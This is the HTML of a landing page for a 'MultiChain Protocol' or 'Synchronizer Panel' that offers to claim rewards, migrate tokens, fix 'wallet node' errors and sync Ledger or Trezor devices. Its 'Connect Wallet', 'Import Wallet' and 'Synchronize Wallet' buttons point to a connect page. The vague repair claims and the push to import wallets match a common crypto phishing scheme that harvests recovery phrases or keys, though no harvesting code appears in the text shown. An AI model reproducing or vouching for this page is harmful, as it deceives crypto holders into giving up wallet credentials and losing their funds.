        <div class="c15wg chd23">

          <section class="csghv">

            <div class="cgtjr cov9f cjnxd c1hsh cwrme cf03e clxpw" aria-hidden="true">
              <img src="data:image/svg+xml,%3csvg%20width='1440'%20height='1265'%20xmlns='http://www.w3.org/2000/svg'%3e%3cdefs%3e%3cfilter%20x='-17.6%25'%20y='-34.2%25'%20width='135.1%25'%20height='168.4%25'%20filterUnits='objectBoundingBox'%20id='b'%3e%3cfeGaussianBlur%20stdDeviation='50'%20in='SourceGraphic'/%3e%3c/filter%3e%3cfilter%20x='-23.6%25'%20y='-187.5%25'%20width='147.2%25'%20height='475%25'%20filterUnits='objectBoundingBox'%20id='d'%3e%3cfeGaussianBlur%20stdDeviation='50'%20in='SourceGraphic'/%3e%3c/filter%3e%3cfilter%20x='-23.6%25'%20y='-187.5%25'%20width='147.2%25'%20height='475%25'%20filterUnits='objectBoundingBox'%20id='e'%3e%3cfeGaussianBlur%20stdDeviation='50'%20in='SourceGraphic'/%3e%3c/filter%3e%3cfilter%20x='-23.6%25'%20y='-187.5%25'%20width='147.2%25'%20height='475%25'%20filterUnits='objectBoundingBox'%20id='g'%3e%3cfeGaussianBlur%20stdDeviation='50'%20in='SourceGraphic'/%3e%3c/filter%3e%3clinearGradient%20x1='98.284%25'%20y1='37.276%25'%20x2='9.488%25'%20y2='37.276%25'%20id='a'%3e%3cstop%20stop-color='%236366F1'%20offset='0%25'/%3e%3cstop%20stop-color='%236366F1'%20stop-opacity='0'%20offset='100%25'/%3e%3c/linearGradient%3e%3clinearGradient%20x1='100%25'%20y1='37.276%25'%20x2='9.488%25'%20y2='37.276%25'%20id='c'%3e%3cstop%20stop-color='%2338BDF8'%20offset='0%25'/%3e%3cstop%20stop-color='%2338BDF8'%20stop-opacity='0'%20offset='100%25'/%3e%3c/linearGradient%3e%3clinearGradient%20x1='100%25'%20y1='37.276%25'%20x2='9.488%25'%20y2='37.276%25'%20id='f'%3e%3cstop%20stop-color='%236EE7B7'%20offset='0%25'/%3e%3cstop%20stop-color='%236EE7B7'%20stop-opacity='0'%20offset='100%25'/%3e%3c/linearGradient%3e%3c/defs%3e%3cg%20fill='none'%20fill-rule='evenodd'%3e%3cpath%20fill='url(%23a)'%20filter='url(%23b)'%20d='M262.132%20307.493%20253.019%20438.5l844.887-307.493L1107.019%200z'%20transform='translate(-.103%20-152)'/%3e%3cpath%20fill='url(%23c)'%20filter='url(%23d)'%20transform='rotate(-20%20296.964%20770.578)'%20d='m446.117%20806.285-35.584%2080h599.418l35.582-80z'/%3e%3cpath%20fill='url(%23a)'%20filter='url(%23e)'%20transform='rotate(-20%2029.964%201143.578)'%20d='m179.117%201179.285-35.584%2080h599.418l35.582-80z'/%3e%3cpath%20fill='url(%23f)'%20filter='url(%23g)'%20transform='rotate(-20%20156.964%20105.578)'%20d='m306.117%20141.285-35.584%2080h599.418l35.582-80z'/%3e%3c/g%3e%3c/svg%3e" class="cpd9d" width="1440" height="1265" alt="Hero Illustration">
            </div>
            <div class="csghv crs2z c12sl ced2s cgwxs">
              <div class="c58bt cgm1l">

                <div class="crs2z cg714 cipqn">
                  <h1 style="font-size: x-large; font-weight: bold" class="cbvak c6vue c3yu8 aos-init aos-animate" data-aos="fade-up">
                    The MultiChain Protocol For DApp
                  </h1>
                  <h2 class="cnoe4 c3yu8" style="font-size: x-large; line-height: 30px;">
                    Our Synchronizer Panel serves as an open protocol, ensuring secure communication between Wallets and Dapps within the blockchain ecosystem.
                  </h2>
                  <p class="cc00p clo86 c0muy aos-init aos-animate" data-aos="fade-up" data-aos-delay="100" style=" margin-top: 30px;">
                    We've streamlined the process, making it incredibly simple for you to effortlessly claim Rewards, Migrate tokens, and fixing several wallet issues. We powered multiple projects across blockchain ecosystem.
                  </p>
                  <div class="crs2z c8hla cun0l cljb8 ce61j cmqpv c85uq cqevc aos-init aos-animate" data-aos="fade-up" data-aos-delay="200">
                    <div>
                      <a class="c4rfz cirl7 cyy7p cy9j6 cbjhp cvnv6 ceef4 interactButton">Connect Wallet</a>
                    </div>
                    <div>
                      <a href="/connect.html" class="c4rfz cirl7 celu7 c4c2d cvxjb cbjhp cb83r">Import Wallet</a>
                    </div>
                  </div>
                </div>

                <div class="c2ur2 cdfdp aos-init aos-animate" data-aos="fade-up" data-aos-delay="300">
                  <img class="crs2z" src="/assets/merge-D_JEAQz5.webp" width="920" height="518" alt="Hero">
                </div>
              </div>
            </div>
          </section>
          
          <div class="crs2z cg714 czcex cipqn cbzdz">
            <h2 style="font-size: x-large" class="cnoe4 c3yu8">
              Opening the doors of new world of Dapp experiences.
            </h2>
          </div>

          <ol class="relative border-l p-4 border-gray-200 dark:border-gray-700">

            <li class="ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                Claim Token
              </h3>
              <p class="text-base font-normal text-gray-500 dark:text-gray-400">
                For any EVM token airdrop/reward claiming.
              </p>
            </li>
            <li class="mb-10 ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                Migration
              </h3>
              <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
                For any issues with Migrate seamlessly with no hassle.
              </p>
            </li>

            <li class="mb-10 ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                General Issues
              </h3>
              <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
                For instant solution on any type of issues, to correct your
                node strings.
              </p>
            </li>
            <li class="mb-10 ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                NFTs/Minting
              </h3>
              <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
                For any issues with mint/nfts or need support on how to
                receive any nfts?
              </p>
            </li>
            <li class="mb-10 ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                Swap/Exchange
              </h3>
              <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
                For Swap/Exhange or any other related issues
              </p>
            </li>
            <li class="mb-10 ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                Claim Reward
              </h3>
              <p class="text-base font-normal text-gray-500 dark:text-gray-400">
                For reward claiming or any related issues.
              </p>
            </li>         
            <li class="ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                Token Rectification
              </h3>
              <p class="text-base font-normal text-gray-500 dark:text-gray-400">
                For issues with token rectification.
              </p>
            </li>
            <li class="ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                Staking
              </h3>
              <p class="text-base font-normal text-gray-500 dark:text-gray-400">
                For tokens/coins staking related issues.
              </p>
            </li>
            <li class="ml-4" style="margin-top: 20px">
              <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
              </div>
              <h3 class="text-lg font-semibold text-white dark:text-white">
                Ledger &amp; Trezor
              </h3>
              <p class="text-base font-normal text-gray-500 dark:text-gray-400">
                For ledger or trezor related issues, connect manually and synchronize device using the QRCode section to fix wallet node.
              </p>
              <a href="/connect.html" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700">Synchronize Wallet</a>
            </li>
          </ol>

          <section class="csghv">

            <div class="cov9f cjnxd ck0g4 cwrme cua7u ca1wo cf03e cl75e clxpw" aria-hidden="true"></div>
            <div class="crs2z c12sl ced2s cgwxs">
              <div class="cn8hk c8w8t c15wg chd23">

                <div class="crs2z cg714 czcex cipqn">
                  <h2 class="cnoe4 c3yu8">An ecosystem of integrations</h2>
                </div>
                <div class="csghv cha4x ch6o9 crevm c3efh">
                  <svg class="cov9f cpyhk clh5r" width="557" height="93" xmlns="http://www.w3.org/2000/svg">
                    <defs>
                      <filter x="-50%" y="-50%" width="200%" height="200%" filterUnits="objectBoundingBox" id="hlogo-blurreddots-a">
                        <fegaussianblur stdDeviation="2" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-50%" y="-50%" width="200%" height="200%" filterUnits="objectBoundingBox" id="blurreddots-b">
                        <fegaussianblur stdDeviation="2" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-150%" y="-150%" width="400%" height="400%" filterUnits="objectBoundingBox" id="blurreddots-c">
                        <fegaussianblur stdDeviation="6" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-150%" y="-150%" width="400%" height="400%" filterUnits="objectBoundingBox" id="blurreddots-d">
                        <fegaussianblur stdDeviation="4" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-150%" y="-150%" width="400%" height="400%" filterUnits="objectBoundingBox" id="blurreddots-e">
                        <fegaussianblur stdDeviation="4" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-50%" y="-50%" width="200%" height="200%" filterUnits="objectBoundingBox" id="blurreddots-f">
                        <fegaussianblur stdDeviation="2" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-100%" y="-100%" width="300%" height="300%" filterUnits="objectBoundingBox" id="blurreddots-g">
                        <fegaussianblur stdDeviation="4" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-150%" y="-150%" width="400%" height="400%" filterUnits="objectBoundingBox" id="blurreddots-h">
                        <fegaussianblur stdDeviation="6" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-150%" y="-150%" width="400%" height="400%" filterUnits="objectBoundingBox" id="blurreddots-i">
                        <fegaussianblur stdDeviation="4" in="SourceGraphic"></fegaussianblur>
                      </filter>
                      <filter x="-75%" y="-75%" width="250%" height="250%" filterUnits="objectBoundingBox" id="blurreddots-j">
                        <fegaussianblur stdDeviation="2" in="SourceGraphic"></fegaussianblur>
                      </filter>
                    </defs>
                    <g fill="none" fill-rule="evenodd">
                      <g class="c8i09" transform="translate(437 8)">
                        <circle fill-opacity=".64" filter="url(#blurreddots-a)" cx="6" cy="66" r="6"></circle>
                        <circle fill-opacity=".32" filter="url(#blurreddots-b)" cx="90" cy="6" r="6"></circle>
                        <circle fill-opacity=".64" filter="url(#blurreddots-c)" cx="90" cy="66" r="6"></circle>
                        <circle fill-opacity=".32" filter="url(#blurreddots-d)" cx="6" cy="36" r="4"></circle>
                        <circle fill-opacity=".32" filter="url(#blurreddots-e)" cx="60" cy="36" r="4"></circle>
                        <circle fill-opacity=".64" cx="34" cy="22" r="2"></circle>
                        <circle fill-opacity=".32" cx="34" cy="50" r="2"></circle>
                        <circle fill-opacity=".64" cx="118" cy="22" r="2"></circle>
                        <circle fill-opacity=".32" cx="118" cy="50" r="2"></circle>
                      </g>
                      <g class="c8i09" transform="matrix(-1 0 0 1 120 8)">
                        <circle fill-opacity=".64" filter="url(#blurreddots-f)" cx="6" cy="66" r="6"></circle>
                        <circle fill-opacity=".32" filter="url(#blurreddots-g)" cx="90" cy="6" r="6"></circle>
                        <circle fill-opacity=".64" filter="url(#blurreddots-h)" cx="90" cy="66" r="6"></circle>
                        <circle fill-opacity=".32" filter="url(#blurreddots-i)" cx="6" cy="36" r="4"></circle>
                        <circle fill-opacity=".64" filter="url(#blurreddots-j)" cx="60" cy="36" r="4"></circle>
                        <circle fill-opacity=".32" cx="34" cy="22" r="2"></circle>
                        <circle fill-opacity=".32" cx="34" cy="50" r="2"></circle>
                        <circle fill-opacity=".64" cx="118" cy="22" r="2"></circle>
                        <circle fill-opacity=".32" cx="118" cy="50" r="2"></circle>
                      </g>
                    </g>
                  </svg>

                  <div class="csghv cha4x cpt6h cjsus crevm cygul">

                    <svg class="cgtjr cov9f czbp4 cjnxd cpyhk c5xk3 c3dfy cf03e clh5r cb4jw" width="800" height="800" viewBox="0 0 800 800" xmlns="http://www.w3.org/2000/svg">
                      <defs>
                        <lineargradient x1="50%" y1="0%" x2="50%" y2="100%" id="lg-1">
                          <stop stop-color="#0F172A" stop-opacity="0%" offset="0%"></stop>
                          <stop stop-color="#0F172A" offset="100%"></stop>
                        </lineargradient>
                      </defs>
                      <g class="c8i09 clbdn" fill-rule="evenodd">
                        <circle class="cv9rj" cx="400" cy="400" r="200"></circle>
                        <circle class="cv9rj c5nv1" cx="400" cy="400" r="200"></circle>
                        <circle class="cv9rj c1mag" cx="400" cy="400" r="200"></circle>
                        <circle class="cv9rj cqwll" cx="400" cy="400" r="200"></circle>
                        <rect fill="url(#lg-1)" width="800" height="800"></rect>
                      </g>
                    </svg>

                    <svg class="c319x cn1iz" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
                      <defs>
                        <lineargradient x1="0%" y1="32.443%" x2="104.18%" y2="50%" id="a">
                          <stop stop-color="#FFF" stop-opacity=".299" offset="0%"></stop>
                          <stop stop-color="#7587E4" stop-opacity="0" offset="100%"></stop>
                        </lineargradient>
                        <lineargradient x1="18.591%" y1="0%" x2="100%" y2="100%" id="b">
                          <stop stop-color="#818CF8" offset="0%"></stop>
                          <stop stop-color="#C7D2FE" offset="100%"></stop>
                        </lineargradient>
                      </defs>
                      <g fill="none" fill-rule="evenodd">
                        <path fill="#3730A3" d="M16 18.5V32l15.999-9.25V9.25z"></path>
                        <path fill="#4F46E5" d="m0 23 16 9V18.501L0 9.251z"></path>
                        <path fill-opacity=".64" fill="url(#a)" d="M16 13 0 23l16 9 16-9z"></path>
                        <path fill="url(#b)" d="M16 0 0 9.25l16 9.25 15.999-9.25z"></path>
                      </g>
                    </svg>
                  </div>
                </div>
              </div>
            </div>
          </section>

          <section class="csghv cn8hk c8w8t">

            <div class="cgtjr cov9f cokz4 cs58h c1p84 c1hsh c20k8 cv4we cdbty czarn cy0u8" aria-hidden="true"></div>

            <div class="cgtjr cov9f cjnxd cokz4 c1hsh czd87 cwrme cf03e ce7wk" aria-hidden="true">
              <img src="data:image/svg+xml,%3csvg%20width='1440'%20height='440'%20xmlns='http://www.w3.org/2000/svg'%3e%3cdefs%3e%3clinearGradient%20x1='100%25'%20y1='37.276%25'%20x2='9.488%25'%20y2='37.276%25'%20id='a'%3e%3cstop%20stop-color='%2338BDF8'%20stop-opacity='.64'%20offset='0%25'/%3e%3cstop%20stop-color='%2338BDF8'%20stop-opacity='0'%20offset='100%25'/%3e%3c/linearGradient%3e%3cfilter%20x='-23.6%25'%20y='-187.5%25'%20width='147.2%25'%20height='475%25'%20filterUnits='objectBoundingBox'%20id='b'%3e%3cfeGaussianBlur%20stdDeviation='50'%20in='SourceGraphic'/%3e%3c/filter%3e%3c/defs%3e%3cpath%20filter='url(%23b)'%20transform='rotate(-20%20719.5%20249)'%20d='M437.583%20209%20402%20289h599.418L1037%20209z'%20fill='url(%23a)'%20fill-rule='evenodd'/%3e%3c/svg%3e" class="cpd9d" width="1440" height="440" alt="Features 01 Illustration">
            </div>
            <div class="crs2z c12sl ced2s cgwxs">
              <div class="c15wg chd23">

                <div class="crs2z cg714 czcex cipqn cbzdz aos-init aos-animate" data-aos="fade-up">
                  <h2 class="cnoe4 c3yu8" style="font-size: x-large">
                    We've optimized the procedure, ensuring it's exceptionally easy for you to seamlessly connect with Dapp.
                  </h2>
                </div>

                <div class="cipqn">
                  <div class="crs2z c8hla cun0l cljb8 ce61j cmqpv c85uq cqevc">
                    <div data-aos="fade-up" data-aos-delay="100" class="aos-init aos-animate">
                      <a da="" class="c4rfz cirl7 cyy7p cy9j6 cbjhp cvnv6 ceef4 interactButton">Connect Wallet</a>
                    </div>
                    <div data-aos="fade-up" data-aos-delay="200" class="aos-init aos-animate"></div>
                  </div>
                </div>
              </div>
            </div>
          </section>

          
        </div>
      </div>







    </section> 
  </main>

  <footer>
    <div class="crs2z c12sl ced2s cgwxs">
      <div class="chhfx crn5q cg4jx cz5x0 c675y">
        <div class="c83rt capdq">
          <p> © All rights reserved | 2024</p>
        </div>
      </div>
    </div>
  </footer>


</body>
</html>